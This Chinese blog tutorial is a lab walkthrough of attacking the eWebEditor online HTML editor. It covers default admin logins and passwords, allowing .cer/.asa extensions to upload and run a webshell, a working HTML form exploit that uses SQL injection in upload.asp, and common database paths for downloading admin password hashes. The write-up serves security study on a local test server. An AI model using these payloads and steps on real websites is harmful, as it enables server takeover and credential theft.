22-任意文件上传与编辑器漏洞(Ewebeditor、fckeditor、CKFinder、southidceditor等)(四)

Ewebeditor编辑器漏洞

1、Ewebeditor编辑器介绍

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!

2、eWebEditor编辑器搭建过程:

VM的Windows2003      eWebEditor_v216_Free   

打开IIS,新建网站:

c6732c9fddb94b02897553043aacfec7.png

设置网站本地ip地址及端口:

IP地址
10.0.0.101
端口
92

44c577f52e524be48cf77db7601b0623.png

  主目录路径:

C:\wwwtest\1111\wwwwtest\eWebEditor

2acab7b33ef34e67bacb538ee4e76761.png

 设置权限:

b7c06d393d9f40329b1a156433552900.png

搭建完成。


3、Ewebeditor利用核心

默认后台:www.xxxx.com/ewebeditor/admin_login.asp

默认数据库:ewebeditor/db/ewebeditor.mdb

默认账号密码:admin admin/admin888

4、利用过程

通常入侵ewebeditor编辑器的步骤如下:

1、首先访问默认管理页看是否存在

       默认管理页地址2.80以前为 ewebeditor/admin_login.asp

 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例) 。

打开后台:

http://10.0.0.101:92/Admin_Login.asp

54df54a3d9734c7996cc2cb2570bd342.png

2、默认管理帐号密码

默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。

b66a272f3b584a30af49775496d8c7a5.png

25428c075dbd4a3f92cbcc2581de8854.png

样式管理--新建样式:

dce8b85d9cfb416ea1e334a46dd349ca.png

设置名称及添加照片类型:

(通过改照片类型方式上传文件绕过)

asp|cer|sas|aaspsp
## 因这几种类型默认可以被解析

c5bc8320f18847d1a6bc51df1fc20b7a.png

新建样式--工具栏--按钮设置--添加【插入或修改照片】按钮--保存设置

56e5ef8d73aa40aa8faa11501d5aa348.png

16c9a5f596564dfda0866c518aed125e.png

92d35690b4af4aac936647cd4e4a8c82.png

84556d0534ad4cf18c9ec222386e2d76.png

预览新建的样式:

622fc17074d64f08886a8094deafea3a.png

功能不能用,阅览器版本过高问题,切换到低版本正常使用:

53f96994b3ce4c52afdcfc1031374db4.png

 使用低版本阅览器打开新建的样式,预览,点图标上传:

上传文件:123.cer

2f967a4e26784ce896c15b4361dcc3d8.png

点击确定,webshell木马上传成功,之后,查看代码,就能看到完整的地址。

阅览器访问上传的文件,webshell木马被执行:

5aee95d48aa84f878ed57117accfba9f.png

可以远程操控目标主机了。


可以在在线平台查询eWebEditor相关漏洞及详细信息:

f24bdf36d1e246efa7e160db5578147b.png

如:eWebEditor 2.1.6 /upload.asp 文件上传漏洞

查找漏洞相关信息:

2f35c2df01b04dab9e0956de7af8d113.png

新建html文件,将代码粘贴到html文件中保存:

158bec5041c94aaa863d3a460dff5304.png

<form action="http://10.0.0.101:92/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

//将127.1/替换网站地址10.0.0.101:92

843a88e7247345dca12bc7c527554e80.png打开html文件进行上传 :

2d6adc635bf448118971b4c48a5241ea.png

上传成功之后,右击页面查看源代码:

18f705d2dd6543c6837f263c1397a767.png

找到上传后重命名文件名:

(发现没有文件路径只有重命名后的文件名,访问文件思路:1、根据报错法2、抓包工具相应包里查看(大部分没有)3、如果网站是开源的,下载源代码在本地虚拟机搭建相同环境复现漏洞,在虚拟机查找文件保存的目录。

2024512195912425.cer

35a904dd60c046759b8ca76a809ec13c.png

根据虚拟机搭建的网站查找文件名找到文件存放路径:

d36c87a5a6b14bc5897821c0202e6c7f.png

C:\wwwtest\1111\wwwwtest\eWebEditor\UploadFile
##C:\wwwtest\1111\wwwwtest\eWebEditor为网站根目录
##UploadFile文件存放目录
即http://10.0.0.101:92/UploadFile/2024512195912425.cer

271450aa80c1483dba4dc57cb0a53762.png

webshell木马执行成功。


3、默认数据库地址

如果密码不是默认的,我们访问的就不是默认数据库。尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_UserPass 都是md5加密的。得到了加密密码。可以去www.cmd5.com www.xmd5.org 等网站进行查询

默认数据库路径为:
ewebeditor/db/ewebeditor.mdb 
常用数据库路径为:
ewebeditor/db/ewebeditor.asa 
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.asa 
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/ewebeditor.mdb
ewebeditor/db/!@#ewebeditor.asp 
ewebeditor/db/ewebeditor1033.mdb
......等等。


  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Xlbb.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值